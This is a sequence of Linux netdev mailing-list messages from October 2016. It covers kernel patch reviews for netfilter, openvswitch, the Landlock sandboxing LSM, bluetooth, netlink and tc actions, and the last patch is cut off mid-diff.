> net/netfilter/core.c: In function 'nf_set_hooks_head':
> net/netfilter/core.c:96:3: error: 'struct net_device' has no member named 
> 'nf_hooks_ingress'
> 
> Are the fixes (see below) on the way to mainline too?

Yes the fixes are already in nf tree and _will_ get pushed.

Pablo and David are attending netdev 1.2 in Tokyo and have obligations.

https://git.kernel.org/cgit/linux/kernel/git/pablo/nf-next.git/

Thanks.






Re: [PATCH net-next v2 1/3] openvswitch: normalize vlan rx path

2016-10-05 Thread Jiri Benc
On Wed, 5 Oct 2016 15:21:32 -0400, Eric Garver wrote:
> How about this incremental change?

Feel free to submit it as a standalone patch. It has nothing to do with
this patchset. In this particular regard, the code is identical before
and after the patchset and is in no way altered by this patch.

 Jiri


Re: [RFC v3 11/22] seccomp,landlock: Handle Landlock hooks per process hierarchy

2016-10-05 Thread Mickaël Salaün


On 04/10/2016 01:52, Kees Cook wrote:
> On Wed, Sep 14, 2016 at 3:34 PM, Mickaël Salaün  wrote:
>>
>> On 14/09/2016 20:43, Andy Lutomirski wrote:
>>> On Wed, Sep 14, 2016 at 12:24 AM, Mickaël Salaün  wrote:
 A Landlock program will be triggered according to its subtype/origin
 bitfield. The LANDLOCK_FLAG_ORIGIN_SECCOMP value will trigger the
 Landlock program when a seccomp filter will return RET_LANDLOCK.
 Moreover, it is possible to return a 16-bit cookie which will be
 readable by the Landlock programs in its context.
>>>
>>> Are you envisioning that the filters will return RET_LANDLOCK most of
>>> the time or rarely?  If it's most of the time, then maybe this could
>>> be simplified a bit by unconditionally calling the landlock filter and
>>> letting the landlock filter access a struct seccomp_data if needed.
>>
>> Exposing seccomp_data in a Landlock context may be a good idea. The main
>> implication is that Landlock programs may then be architecture specific
>> (if dealing with data) as seccomp filters are. Another point is that it
>> remove any direct binding between seccomp filters and Landlock programs.
>> I will try this (more simple) approach.
> 
> Yeah, I would prefer that the seccomp code isn't doing list management
> to identify the landlock hooks to trigger, etc. I think that's better
> done on the LSM side. And since multiple seccomp filters could trigger
> landlock, it may be best to just leave the low 16 bits unused
> entirely. Then all state management is handled by the landlock eBPF
> maps, not a value coming from seccomp that can get stomped on by new
> filters, etc.

Right, this approach should be simpler, more efficient and independent
from seccomp. This will be in the next RFC.



signature.asc
Description: OpenPGP digital signature


error: 'struct net_device' has no member named 'nf_hooks_ingress'

2016-10-05 Thread Michal Sojka
Hi,

On Tue, Oct 04 2016, Sergey Senozhatsky wrote:
> On (09/27/16 19:03), Sergey Senozhatsky wrote:
>> Hello,
>> 
>> On (09/27/16 16:40), Stephen Rothwell wrote:
>> > 
>> > Changes since 20160923:
>> > 
>> 
>> seems that commit e3b37f11e6e4e6b6 ("netfilter: replace list_head with
>> single linked list") breaks the build on !CONFIG_NETFILTER_INGRESS systems
>> accessing ->nf_hooks_ingress

this commit is now in mainline as
e3b37f11e6e4e6b6f02cc762f182ce233d2c1c9d and it breaks my build:

net/netfilter/core.c: In function 'nf_set_hooks_head':
net/netfilter/core.c:96:3: error: 'struct net_device' has no member named 
'nf_hooks_ingress'

Are the fixes (see below) on the way to mainline too?

Thanks.
-Michal



>> 
>> static void nf_set_hooks_head(struct net *net, const struct nf_hook_ops *reg,
>>  struct nf_hook_entry *entry)
>> {
>>switch (reg->pf) {
>>case NFPROTO_NETDEV:
>>/* We already checked in nf_register_net_hook() that this is
>> * used from ingress.
>> */
>>rcu_assign_pointer(reg->dev->nf_hooks_ingress, entry);
>>  
>
>
> so I see two commits in linux-next now that fix the commit in question in
> two patches
>
>  : commit 7816ec564ec40ae20bb7925f733a181cad0cc491 ("netfilter: accommodate
>  : different kconfig in nf_set_hooks_head")
>  :
>  :When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle
>  :the request for registration properly by dropping the hook.  This
>  :releases the entry during the set.
>  :
>  :Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked 
> list")
>
> and
>
>  : commit 5119e4381a90fabd3442bde02707cbd9e5d7367a ("netfilter: Fix potential
>  : null pointer dereference")
>  :
>  :It's possible for nf_hook_entry_head to return NULL.  If two
>  :nf_unregister_net_hook calls happen simultaneously with a single hook
>  :entry in the list, both will enter the nf_hook_mutex critical section.
>  :The first will successfully delete the head, but the second will see
>  :this NULL pointer and attempt to dereference.
>  :
>  :This fix ensures that no null pointer dereference could occur when such
>  :a condition happens.
>  :
>  :Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked 
> list")
>
>
> do you guys plan to fold those into "e3b37f11e6e4" (a preferred way)
> or will send it out as 3 separate patches (um, why) ?
>
>   -ss


Re: [RFC v3 19/22] landlock: Add interrupted origin

2016-10-05 Thread Mickaël Salaün

On 04/10/2016 01:46, Kees Cook wrote:
> On Wed, Sep 14, 2016 at 6:19 PM, Andy Lutomirski  wrote:
>> On Wed, Sep 14, 2016 at 3:14 PM, Mickaël Salaün  wrote:
>>>
>>> On 14/09/2016 20:29, Andy Lutomirski wrote:
 On Wed, Sep 14, 2016 at 12:24 AM, Mickaël Salaün  wrote:
> This third origin of hook call should cover all possible trigger paths
> (e.g. page fault). Landlock eBPF programs can then take decisions
> accordingly.
>
> Signed-off-by: Mickaël Salaün 
> Cc: Alexei Starovoitov 
> Cc: Andy Lutomirski 
> Cc: Daniel Borkmann 
> Cc: Kees Cook 
> ---


>
> +   if (unlikely(in_interrupt())) {

 IMO security hooks have no business being called from interrupts.
 Aren't they all synchronous things done by tasks?  Interrupts are
 driver things.

 Are you trying to check for page faults and such?
>>>
>>> Yes, that was the idea you did put in my mind. Not sure how to deal with
>>> this.
>>>
>>
>> It's not so easy, unfortunately.  The easiest reliable way might be to
>> set a TS_ flag on all syscall entries when TIF_SECCOMP or similar is
>> set.
> 
> For making this series smaller, let's leave the idea idea of interrupt
> hooks out -- the intention is for stricter syscall filtering, yes?
> 
> Once things are more well established and there's a use-case for this,
> it can be added back in.

Right, I'm no more convinced it's worth it.



signature.asc
Description: OpenPGP digital signature


Re: [RFC v3 16/22] bpf/cgroup,landlock: Handle Landlock hooks per cgroup

2016-10-05 Thread Mickaël Salaün


On 04/10/2016 01:43, Kees Cook wrote:
> On Wed, Sep 14, 2016 at 12:24 AM, Mickaël Salaün  wrote:
>> This allows to add new eBPF programs to Landlock hooks dedicated to a
>> cgroup thanks to the BPF_PROG_ATTACH command. Like for socket eBPF
>> programs, the Landlock hooks attached to a cgroup are propagated to the
>> nested cgroups. However, when a new Landlock program is attached to one
>> of this nested cgroup, this cgroup hierarchy fork the Landlock hooks.
>> This design is simple and match the current CONFIG_BPF_CGROUP
>> inheritance. The difference lie in the fact that Landlock programs can
>> only be stacked but not removed. This match the append-only seccomp
>> behavior. Userland is free to handle Landlock hooks attached to a cgroup
>> in more complicated ways (e.g. continuous inheritance), but care should
>> be taken to properly handle error cases (e.g. memory allocation errors).
>>
>> Changes since v2:
>> * new design based on BPF_PROG_ATTACH (suggested by Alexei Starovoitov)
>>
>> Signed-off-by: Mickaël Salaün 
>> Cc: Alexei Starovoitov 
>> Cc: Andy Lutomirski 
>> Cc: Daniel Borkmann 
>> Cc: Daniel Mack 
>> Cc: David S. Miller 
>> Cc: Kees Cook 
>> Cc: Tejun Heo 
>> Link: https://lkml.kernel.org/r/20160826021432.ga8...@ast-mbp.thefacebook.com
>> Link: 
>> https://lkml.kernel.org/r/20160827204307.ga43...@ast-mbp.thefacebook.com
>> ---
>>  include/linux/bpf-cgroup.h  |  7 +++
>>  include/linux/cgroup-defs.h |  2 ++
>>  include/linux/landlock.h|  9 +
>>  include/uapi/linux/bpf.h|  1 +
>>  kernel/bpf/cgroup.c | 33 ++---
>>  kernel/bpf/syscall.c| 11 +++
>>  security/landlock/lsm.c | 40 +++-
>>  security/landlock/manager.c | 32 
>>  8 files changed, 131 insertions(+), 4 deletions(-)
>>
>> [...]
>> diff --git a/kernel/bpf/cgroup.c b/kernel/bpf/cgroup.c
>> index 7b75fa692617..1c18fe46958a 100644
>> --- a/kernel/bpf/cgroup.c
>> +++ b/kernel/bpf/cgroup.c
>> @@ -15,6 +15,7 @@
>>  #include 
>>  #include 
>>  #include 
>> +#include 
>>
>>  DEFINE_STATIC_KEY_FALSE(cgroup_bpf_enabled_key);
>>  EXPORT_SYMBOL(cgroup_bpf_enabled_key);
>> @@ -31,7 +32,15 @@ void cgroup_bpf_put(struct cgroup *cgrp)
>> union bpf_object pinned = cgrp->bpf.pinned[type];
>>
>> if (pinned.prog) {
>> -   bpf_prog_put(pinned.prog);
>> +   switch (type) {
>> +   case BPF_CGROUP_LANDLOCK:
>> +#ifdef CONFIG_SECURITY_LANDLOCK
>> +   put_landlock_hooks(pinned.hooks);
>> +   break;
>> +#endif /* CONFIG_SECURITY_LANDLOCK */
>> +   default:
>> +   bpf_prog_put(pinned.prog);
>> +   }
>> static_branch_dec(&cgroup_bpf_enabled_key);
>> }
>> }
> 
> I get creeped out by type-controlled unions of pointers. :P I don't
> have a suggestion to improve this, but I don't like seeing a pointer
> type managed separately from the pointer itself as it tends to bypass
> a lot of both static and dynamic checking. A union is better than a
> cast of void *, but it still worries me. :)

This is not fully satisfactory for me neither but the other approach is
to use two distinct struct fields instead of a union.
Do you prefer if there is a "type" field in the "pinned" struct to
select the union?

 Mickaël



signature.asc
Description: OpenPGP digital signature


[PATCHv2] bluetooth.h: __ variants of u8 and friends are not neccessary inside kernel

2016-10-05 Thread Pavel Machek

bluetooth.h is not part of user API, so __ variants are not neccessary
here.

Signed-off-by: Pavel Machek 

---
v2: not touching stuff that Marcel does not want touched, as it will
become API later.

diff --git a/include/net/bluetooth/bluetooth.h 
b/include/net/bluetooth/bluetooth.h
index bfd1590..aea0371 100644
--- a/include/net/bluetooth/bluetooth.h
+++ b/include/net/bluetooth/bluetooth.h
@@ -196,7 +196,7 @@ typedef struct {
 #define BDADDR_LE_PUBLIC   0x01
 #define BDADDR_LE_RANDOM   0x02
 
-static inline bool bdaddr_type_is_valid(__u8 type)
+static inline bool bdaddr_type_is_valid(u8 type)
 {
switch (type) {
case BDADDR_BREDR:
@@ -208,7 +208,7 @@ static inline bool bdaddr_type_is_valid(__u8 type)
return false;
 }
 
-static inline bool bdaddr_type_is_le(__u8 type)
+static inline bool bdaddr_type_is_le(u8 type)
 {
switch (type) {
case BDADDR_LE_PUBLIC:
@@ -278,15 +278,16 @@ struct sock *bt_accept_dequeue(struct sock *parent, 
struct socket *newsock);
 
 /* Skb helpers */
 struct l2cap_ctrl {
-   __u8sframe:1,
+   u8  sframe:1,
poll:1,
final:1,
fcs:1,
sar:2,
super:2;
-   __u16   reqseq;
-   __u16   txseq;
-   __u8retries;
+
+   u16 reqseq;
+   u16 txseq;
+   u8  retries;
__le16  psm;
bdaddr_t bdaddr;
struct l2cap_chan *chan;
@@ -302,7 +303,7 @@ typedef void (*hci_req_complete_skb_t)(struct hci_dev 
*hdev, u8 status,
 #define HCI_REQ_SKBBIT(1)
 
 struct hci_ctrl {
-   __u16 opcode;
+   u16 opcode;
u8 req_flags;
u8 req_event;
union {
@@ -312,10 +313,10 @@ struct hci_ctrl {
 };
 
 struct bt_skb_cb {
-   __u8 pkt_type;
-   __u8 force_active;
-   __u16 expect;
-   __u8 incoming:1;
+   u8 pkt_type;
+   u8 force_active;
+   u16 expect;
+   u8 incoming:1;
union {
struct l2cap_ctrl l2cap;
struct hci_ctrl hci;
@@ -365,7 +366,7 @@ out:
return NULL;
 }
 
-int bt_to_errno(__u16 code);
+int bt_to_errno(u16 code);
 
 void hci_sock_set_flag(struct sock *sk, int nr);
 void hci_sock_clear_flag(struct sock *sk, int nr);



-- 
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) 
http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html


signature.asc
Description: Digital signature


Re: [RFC v2 00/10] Landlock LSM: Unprivileged sandboxing

2016-10-05 Thread Mickaël Salaün

On 04/10/2016 00:56, Kees Cook wrote:
> On Tue, Sep 20, 2016 at 10:08 AM, Mickaël Salaün  wrote:
>>
>> On 15/09/2016 11:19, Pavel Machek wrote:
>>> Hi!
>>>
 This series is a proof of concept to fill some missing part of seccomp as 
 the
 ability to check syscall argument pointers or creating more dynamic 
 security
 policies. The goal of this new stackable Linux Security Module (LSM) called
 Landlock is to allow any process, including unprivileged ones, to create
 powerful security sandboxes comparable to the Seatbelt/XNU Sandbox or the
 OpenBSD Pledge. This kind of sandbox help to mitigate the security impact 
 of
 bugs or unexpected/malicious behaviors in userland applications.

 The first RFC [1] was focused on extending seccomp while staying at the 
 syscall
 level. This brought a working PoC but with some (mitigated) ToCToU race
 conditions due to the seccomp ptrace hole (now fixed) and the non-atomic
 syscall argument evaluation (hence the LSM hooks).
>>>
>>> Long and nice description follows. Should it go to Documentation/
>>> somewhere?
>>>
>>> Because some documentation would be useful...
>>>   Pavel
>>
>> Right, but I was looking for feedback before investing in documentation. :)
> 
> Heh, understood. There are a number of grammar issues that slow me
> down when reading this, so when it does move into Documentation/, I'll
> have some English nit-picks. :)
> 
> While reading I found myself wanting an explicit list of "guiding
> principles" for anyone implementing new hooks. It is touched on in
> several places (don't expose things, don't allow for privilege
> changes, etc). Having that spelled out somewhere would be nice.

Right, I'm going to try to create a more consistent documentation with
the "guiding principles".

 Mickaël



signature.asc
Description: OpenPGP digital signature


Re: [PATCH net] netlink: do not enter direct reclaim from netlink_dump()

2016-10-05 Thread Greg
On Thu, 2016-10-06 at 04:13 +0900, Eric Dumazet wrote:
> From: Eric Dumazet 
> 
> Since linux-3.15, netlink_dump() can use up to 16384 bytes skb
> allocations.
> 
> Due to struct skb_shared_info ~320 bytes overhead, we end up using
> order-3 (on x86) page allocations, that might trigger direct reclaim and
> add stress.
> 
> The intent was really to attempt a large allocation but immediately
> fallback to a smaller one (order-1 on x86) in case of memory stress.
> 
> On recent kernels (linux-4.4), we can remove __GFP_DIRECT_RECLAIM to
> meet the goal. Old kernels would need to remove __GFP_WAIT
> 
> While we are at it, since we do an order-3 allocation, allow to use
> all the allocated bytes instead of 16384 to reduce syscalls during
> large dumps.
> 
> iproute2 already uses 32KB recvmsg() buffer sizes.
> 
> Alexei provided an initial patch downsizing to SKB_WITH_OVERHEAD(16384)
> 
> Fixes: 9063e21fb026 ("netlink: autosize skb lengthes")
> Signed-off-by: Eric Dumazet 
> Reported-by: Alexei Starovoitov 
> Cc: Greg Thelen 
> ---
> Note: This will apply to net tree when it has synced with Linus tree.
> 
>  net/netlink/af_netlink.c |7 ---
>  1 file changed, 4 insertions(+), 3 deletions(-)
> 
> diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
> index 
> 627f898c05b96552318a881ce995ccc3342e1576..62bea4591054820eb516ef016214ee23fe89b6e9
>  100644
> --- a/net/netlink/af_netlink.c
> +++ b/net/netlink/af_netlink.c
> @@ -1832,7 +1832,7 @@ static int netlink_recvmsg(struct socket *sock, struct 
> msghdr *msg, size_t len,
>   /* Record the max length of recvmsg() calls for future allocations */
>   nlk->max_recvmsg_len = max(nlk->max_recvmsg_len, len);
>   nlk->max_recvmsg_len = min_t(size_t, nlk->max_recvmsg_len,
> -  16384);
> +  SKB_WITH_OVERHEAD(32768));
>  
>   copied = data_skb->len;
>   if (len < copied) {
> @@ -2083,8 +2083,9 @@ static int netlink_dump(struct sock *sk)
>  
>   if (alloc_min_size < nlk->max_recvmsg_len) {
>   alloc_size = nlk->max_recvmsg_len;
> - skb = alloc_skb(alloc_size, GFP_KERNEL |
> - __GFP_NOWARN | __GFP_NORETRY);
> + skb = alloc_skb(alloc_size,
> + (GFP_KERNEL & ~__GFP_DIRECT_RECLAIM) |
> + __GFP_NOWARN | __GFP_NORETRY);
>   }
>   if (!skb) {
>   alloc_size = alloc_min_size;
> 
> 

This code has changed a lot since I first added it in 2011 but this
appears to be the right thing to do.  I guess the order of operations
for the bitwise '&' and the bitwise '~' are correct, I don't have my C
manual laying around.

Reviewed-by: Greg Rose 




RE: [net-next 08/13] fsl/fman: check pcsphy pointer before use

2016-10-05 Thread Madalin-Cristian Bucur
> -Original Message-
> From: David Laight [mailto:david.lai...@aculab.com]
> Sent: Tuesday, October 04, 2016 5:44 PM
> To: Madalin-Cristian Bucur ;
> netdev@vger.kernel.org
> Cc: linuxdev.baldr...@gmail.com; linuxppc-...@lists.ozlabs.org;
> da...@davemloft.net; linux-ker...@vger.kernel.org
> Subject: RE: [net-next 08/13] fsl/fman: check pcsphy pointer before use
> 
> From: Madalin Bucur
> > Sent: 04 October 2016 08:33
> > Subject: [net-next 08/13] fsl/fman: check pcsphy pointer before use
> ..
> > --- a/drivers/net/ethernet/freescale/fman/fman_memac.c
> > +++ b/drivers/net/ethernet/freescale/fman/fman_memac.c
> > @@ -507,6 +507,9 @@ static void setup_sgmii_internal_phy(struct
> fman_mac *memac,
> >  {
> > u16 tmp_reg16;
> >
> > +   if (WARN_ON(!memac->pcsphy))
> > +   return;
> > +
> 
> Why?
> 
> Either it can validly be NULL in which case you don't want the message.
> Or it shouldn't be NULL in which case you need to find and fix the bug.
> The later kernel OOPS will make the bug much easier to find.
> 
>   David

You can get into that situation if you have a broken device tree, state into
which someone may get while trying to create the device tree for a new
board. Avoiding a crash here allows the user to look at the device trees as
seen by the kernel / add some debug code if needed.

Madalin


Re: [PATCH net] Fixing a bug in team driver due to incorrect 'unsigned int' to 'int' conversion

2016-10-05 Thread Eric Dumazet
On Wed, 2016-10-05 at 09:06 -0400, Alex Sidorenko wrote:
> Roundrobin runner of team driver uses 'unsigned int' variable to count the 
> number of sent_packets.
> Later it is passed to a subroutine team_num_to_port_index(struct team *team, 
> int num) as
> 'num' and when we reach MAXINT (2**31-1), 'num' becomes negative.
> 
> This leads to using incorrect hash-bucket for port lookup and as a result, 
> packets are dropped. The fix
> consists of changing 'int num' to 'unsigned int num'. Testing of a fixed 
> kernel shows that there
> is no packet drop anymore.
> 
> 
> Signed-off-by: Alex Sidorenko 

Note that lines in your changelog are longer than the norm 
( Documentation/SubmittingPatches around line 619 )

 - The body of the explanation, line wrapped at 75 columns, which will
   be copied to the permanent changelog to describe this patch.

Otherwise, patch looks, welcome to the club Alex !

Acked-by: Eric Dumazet 




[PATCH] net: bgmac: Fix errant feature flag check

2016-10-05 Thread Jon Mason
During the conversion to the feature flags, a check against
ci->id != BCMA_CHIP_ID_BCM47162
became
bgmac->feature_flags & BGMAC_FEAT_CLKCTLS
instead of
!(bgmac->feature_flags & BGMAC_FEAT_CLKCTLS)

Reported-by: Rafał Miłecki 
Signed-off-by: Jon Mason 
---
 drivers/net/ethernet/broadcom/bgmac.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/ethernet/broadcom/bgmac.c 
b/drivers/net/ethernet/broadcom/bgmac.c
index c4751ec..87d00ea 100644
--- a/drivers/net/ethernet/broadcom/bgmac.c
+++ b/drivers/net/ethernet/broadcom/bgmac.c
@@ -1024,7 +1024,7 @@ static void bgmac_enable(struct bgmac *bgmac)
 
mode = (bgmac_read(bgmac, BGMAC_DEV_STATUS) & BGMAC_DS_MM_MASK) >>
BGMAC_DS_MM_SHIFT;
-   if (bgmac->feature_flags & BGMAC_FEAT_CLKCTLST || mode != 0)
+   if (!(bgmac->feature_flags & BGMAC_FEAT_CLKCTLST) || mode != 0)
bgmac_set(bgmac, BCMA_CLKCTLST, BCMA_CLKCTLST_FORCEHT);
if (bgmac->feature_flags & BGMAC_FEAT_CLKCTLST && mode == 2)
bgmac_cco_ctl_maskset(bgmac, 1, ~0,
-- 
2.7.4



Re: [PATCH net-next v2 1/3] openvswitch: normalize vlan rx path

2016-10-05 Thread Eric Garver
On Wed, Oct 05, 2016 at 09:07:09PM +0200, Jiri Benc wrote:
> On Wed, 5 Oct 2016 14:44:26 -0400, Eric Garver wrote:
> > On Wed, Oct 05, 2016 at 08:31:52PM +0300, Eyal Birger wrote:
> > > Just seemed less future safe to keep a pointer to an old packet lying 
> > > around.
> > 
> > I agree. Alternatively refresh the eth pointer.
> 
> Sorry guys, that just doesn't make sense. Everyone should know that
> reloading of skb pointer means the former pointers to its data may
> become invalid. Please point me to any place in the kernel where we
> reload the data pointer "just because" even when not used.
> 

How about this incremental change?


diff --git a/net/openvswitch/datapath.c b/net/openvswitch/datapath.c
index 7ef02752d4ba..0dd36f353c53 100644
--- a/net/openvswitch/datapath.c
+++ b/net/openvswitch/datapath.c
@@ -562,7 +562,6 @@ static int ovs_packet_cmd_execute(struct sk_buff *skb, 
struct genl_info *info)
struct sw_flow *flow;
struct sw_flow_actions *sf_acts;
struct datapath *dp;
-   struct ethhdr *eth;
struct vport *input_vport;
u16 mru = 0;
int len;
@@ -584,14 +583,12 @@ static int ovs_packet_cmd_execute(struct sk_buff *skb, 
struct genl_info *info)
nla_memcpy(__skb_put(packet, len), a[OVS_PACKET_ATTR_PACKET], len);
 
skb_reset_mac_header(packet);
-   eth = eth_hdr(packet);
 
/* Normally, setting the skb 'protocol' field would be handled by a
 * call to eth_type_trans(), but it assumes there's a sending
 * device, which we may not have. */
-   if (eth_proto_is_802_3(eth->h_proto))
-   packet->protocol = eth->h_proto;
-   else
+   packet->protocol = eth_hdr(packet)->h_proto;
+   if (!eth_proto_is_802_3(packet->protocol))
packet->protocol = htons(ETH_P_802_2);
 
if (eth_type_vlan(packet->protocol)) {


Re: [PATCH] bluetooth.h: __ variants of u8 and friends are not neccessary inside kernel

2016-10-05 Thread Joe Perches
On Wed, 2016-10-05 at 21:11 +0200, Pavel Machek wrote:
> On Wed 2016-10-05 10:53:16, Joe Perches wrote:
> > On Wed, 2016-10-05 at 13:14 +0200, Marcel Holtmann wrote:
> > > Hi Pavel,
> > > 
> > > > bluetooth.h is not part of user API, so __ variants are not neccessary
> > > > here.
> > > > 
> > > > Signed-off-by: Pavel Machek 
> > > > 
> > > > diff --git a/include/net/bluetooth/bluetooth.h 
> > > > b/include/net/bluetooth/bluetooth.h
> > 
> > []
> > > > struct bt_skb_cb {
> > > > -   __u8 pkt_type;
> > > > -   __u8 force_active;
> > > > -   __u16 expect;
> > > > -   __u8 incoming:1;
> > > > +   u8 pkt_type;
> > > > +   u8 force_active;
> > > > +   u16 expect;
> > > > +   u8 incoming:1;
> > > > union {
> > > > struct l2cap_ctrl l2cap;
> > > > struct hci_ctrl hci;
> > 
> > 
> > trivia:
> > 
> > It's generally faster to use bool instead of u8 foo:1;
> 
> Ok, but I'm not changing that in this patch.
> (And actually, bool will take a lot more memory, right?)

No worries, and bool is the same size as u8.
> 


[PATCH net] netlink: do not enter direct reclaim from netlink_dump()

2016-10-05 Thread Eric Dumazet
From: Eric Dumazet 

Since linux-3.15, netlink_dump() can use up to 16384 bytes skb
allocations.

Due to struct skb_shared_info ~320 bytes overhead, we end up using
order-3 (on x86) page allocations, that might trigger direct reclaim and
add stress.

The intent was really to attempt a large allocation but immediately
fallback to a smaller one (order-1 on x86) in case of memory stress.

On recent kernels (linux-4.4), we can remove __GFP_DIRECT_RECLAIM to
meet the goal. Old kernels would need to remove __GFP_WAIT

While we are at it, since we do an order-3 allocation, allow to use
all the allocated bytes instead of 16384 to reduce syscalls during
large dumps.

iproute2 already uses 32KB recvmsg() buffer sizes.

Alexei provided an initial patch downsizing to SKB_WITH_OVERHEAD(16384)

Fixes: 9063e21fb026 ("netlink: autosize skb lengthes")
Signed-off-by: Eric Dumazet 
Reported-by: Alexei Starovoitov 
Cc: Greg Thelen 
---
Note: This will apply to net tree when it has synced with Linus tree.

 net/netlink/af_netlink.c |7 ---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
index 
627f898c05b96552318a881ce995ccc3342e1576..62bea4591054820eb516ef016214ee23fe89b6e9
 100644
--- a/net/netlink/af_netlink.c
+++ b/net/netlink/af_netlink.c
@@ -1832,7 +1832,7 @@ static int netlink_recvmsg(struct socket *sock, struct 
msghdr *msg, size_t len,
/* Record the max length of recvmsg() calls for future allocations */
nlk->max_recvmsg_len = max(nlk->max_recvmsg_len, len);
nlk->max_recvmsg_len = min_t(size_t, nlk->max_recvmsg_len,
-16384);
+SKB_WITH_OVERHEAD(32768));
 
copied = data_skb->len;
if (len < copied) {
@@ -2083,8 +2083,9 @@ static int netlink_dump(struct sock *sk)
 
if (alloc_min_size < nlk->max_recvmsg_len) {
alloc_size = nlk->max_recvmsg_len;
-   skb = alloc_skb(alloc_size, GFP_KERNEL |
-   __GFP_NOWARN | __GFP_NORETRY);
+   skb = alloc_skb(alloc_size,
+   (GFP_KERNEL & ~__GFP_DIRECT_RECLAIM) |
+   __GFP_NOWARN | __GFP_NORETRY);
}
if (!skb) {
alloc_size = alloc_min_size;




Re: [PATCH] bluetooth.h: __ variants of u8 and friends are not neccessary inside kernel

2016-10-05 Thread Pavel Machek
On Wed 2016-10-05 10:53:16, Joe Perches wrote:
> On Wed, 2016-10-05 at 13:14 +0200, Marcel Holtmann wrote:
> > Hi Pavel,
> > 
> > > bluetooth.h is not part of user API, so __ variants are not neccessary
> > > here.
> > > 
> > > Signed-off-by: Pavel Machek 
> > > 
> > > diff --git a/include/net/bluetooth/bluetooth.h 
> > > b/include/net/bluetooth/bluetooth.h
> []
> > > struct bt_skb_cb {
> > > - __u8 pkt_type;
> > > - __u8 force_active;
> > > - __u16 expect;
> > > - __u8 incoming:1;
> > > + u8 pkt_type;
> > > + u8 force_active;
> > > + u16 expect;
> > > + u8 incoming:1;
> > >   union {
> > >   struct l2cap_ctrl l2cap;
> > >   struct hci_ctrl hci;
> 
> trivia:
> 
> It's generally faster to use bool instead of u8 foo:1;

Ok, but I'm not changing that in this patch.

(And actually, bool will take a lot more memory, right?)
Pavel
-- 
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) 
http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html


signature.asc
Description: Digital signature


Re: [PATCH net-next v2 1/3] openvswitch: normalize vlan rx path

2016-10-05 Thread Jiri Benc
On Wed, 5 Oct 2016 14:44:26 -0400, Eric Garver wrote:
> On Wed, Oct 05, 2016 at 08:31:52PM +0300, Eyal Birger wrote:
> > Just seemed less future safe to keep a pointer to an old packet lying 
> > around.
> 
> I agree. Alternatively refresh the eth pointer.

Sorry guys, that just doesn't make sense. Everyone should know that
reloading of skb pointer means the former pointers to its data may
become invalid. Please point me to any place in the kernel where we
reload the data pointer "just because" even when not used.

 Jiri


Re: [PATCH net-next v2 1/3] openvswitch: normalize vlan rx path

2016-10-05 Thread Eric Garver
On Wed, Oct 05, 2016 at 08:31:52PM +0300, Eyal Birger wrote:
> On Wed, Oct 5, 2016 at 8:23 PM, Jiri Benc  wrote:
> > On Wed, 5 Oct 2016 17:18:08 +0300, Eyal Birger wrote:
> >> I think at this point, 'eth' may point to a freed packet.
> >
> > It may but how does that matter? eth is not used beyond that point.
> 
> Definitely a nit. For sure not critical.
> 
> Just seemed less future safe to keep a pointer to an old packet lying around.

I agree. Alternatively refresh the eth pointer.


Re: [PATCH net] Panic when tc_lookup_action_n finds a partially initialized action.

2016-10-05 Thread Cong Wang
On Wed, Oct 5, 2016 at 11:01 AM, Cong Wang  wrote:
> On Tue, Oct 4, 2016 at 11:52 PM, Krister Johansen
>  wrote:
>> On Mon, Oct 03, 2016 at 11:22:33AM -0700, Cong Wang wrote:
>>> Please try the attached patch. I also convert the read path to RCU
>>> to avoid a possible deadlock. A quick test shows no lockdep splat.
>>
>> I tried this patch, but it doesn't solve the problem.  I got a panic on
>> my very first try:
>
> Thanks for testing it.
>
>
>> The problem here is the same as before: by using RCU the race isn't
>> fixed because the module is still discoverable from act_base before the
>> pernet initialization is completed.
>>
>> You can see from the trap frame that the first two arguments to
>> tcf_hash_check were 0.  It couldn't look up the correct per-subsystem
>> pointer because the id hadn't yet been registered.
>
> I thought the problem is that we don't do pernet ops registration and
> action ops registration atomically therefore chose to use mutex+RCU,
> but I was wrong, the problem here is just ordering, we need to finish
> the pernet initialization before making action ops visible.
>
> If so, why not just reorder them? Does the attached patch make any
> sense now? Our pernet init doesn't rely on act_base, so even we have
> some race, the worst case is after we initialize the pernet netns for an
> action but its ops still not visible, which seems fine (at least no crash).

BTW, I should remove the 'if' check for unregister_pernet_subsys() in
tcf_unregister_action()... Otherwise the error path doesn't work. ;-)


Re: [PATCH net] Panic when tc_lookup_action_n finds a partially initialized action.

2016-10-05 Thread Cong Wang
On Tue, Oct 4, 2016 at 11:52 PM, Krister Johansen
 wrote:
> On Mon, Oct 03, 2016 at 11:22:33AM -0700, Cong Wang wrote:
>> Please try the attached patch. I also convert the read path to RCU
>> to avoid a possible deadlock. A quick test shows no lockdep splat.
>
> I tried this patch, but it doesn't solve the problem.  I got a panic on
> my very first try:

Thanks for testing it.


> The problem here is the same as before: by using RCU the race isn't
> fixed because the module is still discoverable from act_base before the
> pernet initialization is completed.
>
> You can see from the trap frame that the first two arguments to
> tcf_hash_check were 0.  It couldn't look up the correct per-subsystem
> pointer because the id hadn't yet been registered.

I thought the problem is that we don't do pernet ops registration and
action ops registration atomically therefore chose to use mutex+RCU,
but I was wrong, the problem here is just ordering, we need to finish
the pernet initialization before making action ops visible.

If so, why not just reorder them? Does the attached patch make any
sense now? Our pernet init doesn't rely on act_base, so even we have
some race, the worst case is after we initialize the pernet netns for an
action but its ops still not visible, which seems fine (at least no crash).

Or I still miss something here?

(Sorry that I don't have the environment to reproduce your bug)

Thanks for your patience and testing!
diff --git a/net/sched/act_api.c b/net/sched/act_api.c
index d09d068..6024920 100644
--- a/net/sched/act_api.c
+++ b/net/sched/act_api.c
@@ -341,22 +341,21 @@ int tcf_register_action(struct tc_action_ops *act,
if (!act->act || !act->dump || !act->init || !act->walk || !act->lookup)
return -EINVAL;
 
+   ret = register_pernet_subsys(ops);
+   if (ret)
+   return ret;
+
write_lock(&act_mod_lock);
